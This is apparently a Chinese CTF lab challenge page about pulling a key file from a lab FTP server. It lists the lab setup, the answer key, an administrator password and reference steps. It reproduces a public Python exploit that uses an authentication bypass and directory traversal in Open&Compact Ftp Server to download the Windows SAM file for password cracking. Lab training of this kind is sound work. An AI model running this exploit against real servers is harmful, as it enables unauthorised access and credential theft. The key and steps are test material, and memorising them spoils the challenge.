目录
1:题目背景
文件传输协议使得主机间可以共享文件。 FTP 使用TCP 生成一个虚拟连接用于控制信息,然后再生成一个单独的 TCP 连接用于数据传输。控制连接使用类似TELNET协议在主机间交换命令和消息。文件传输协议是TCP/IP网络上两台计算机传送文件的协议,FTP是在TCP/IP网络和INTERNET上最早使用的协议之一,它属于网络协议组的应用层。FTP客户机可以给服务器发出命令来下载文件,上传文件,创建或改变服务器上的目录。
2:题目描述
在这一关,你需要利用ftp获取位于目标主机(ip:192.168.102.62)c盘下的key.txt文件,提交里面的key来通过本关。
3:答案提交
1、提交得到的key。
2、请提交操作过程报告,报告中要包含操作的关键过程描述并附截图,以WORD方式提交。
4: 提交key
Key:ftp bypass
5: 关卡环境
VPC1(虚拟PC) | 工具场景:Windows XP操作系统/BT5 |
VPC2(虚拟PC) | Window server 2003 |
软件描述 | 使用工具场景集成的工具软件,参赛者也可以上传工具软件软件到工具场景。 |
关卡环境描述 | 1、学生机与实验室网络直连 2、VPC与实验室网络直连 3、学生机与VPC物理链路连通 |
6:参考步骤
1.打开终端,输入ftp 192.168.102.62 连接ftp服务器,发现ftp服务软件为Gabriel’s ftp server。
2.通过搜索引擎,查找版本找到资料:
http://www.exploit-db.com/exploits/27401/
3.下载攻击脚本27401.py放在桌面,修改为如下:
4.打开新终端并切换到桌面,执行python 27401.py
5.得到key:
环境启动方法
开启目标服务器(IP:192.168.102.62),使用administrator用户登录,密码123456;
从桌面的open-ftpd目录下打开ftpd.exe文件,启动服务。
27401.py脚本
#!/usr/bin/python
# Exploit Title: Open&Compact Ftp Server <= 1.2 Auth bypass & directory traversal sam retrieval
# Date: Aug 7, 2013
# By Wireghoul - http://www.justanotherhacker.com
# Based on Serge Gorbunov's auth bypass (http://www.exploit-db.com/exploits/13932/)
# Software Link: http://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
# Abusing authentication bypass in combination with a directory traversal to grab
# the sam file for offline cracking
import ftplib
import os
# Connect to server
ftp = ftplib.FTP( "192.168.58.135" )
ftp.set_pasv( False )
# Note that we need no authentication at all!!
print ftp.sendcmd( 'CWD C:\\\\windows\\\\repair\\\\' )
print ftp.retrbinary('RETR sam', open('sam', 'wb').write )
ftp.quit()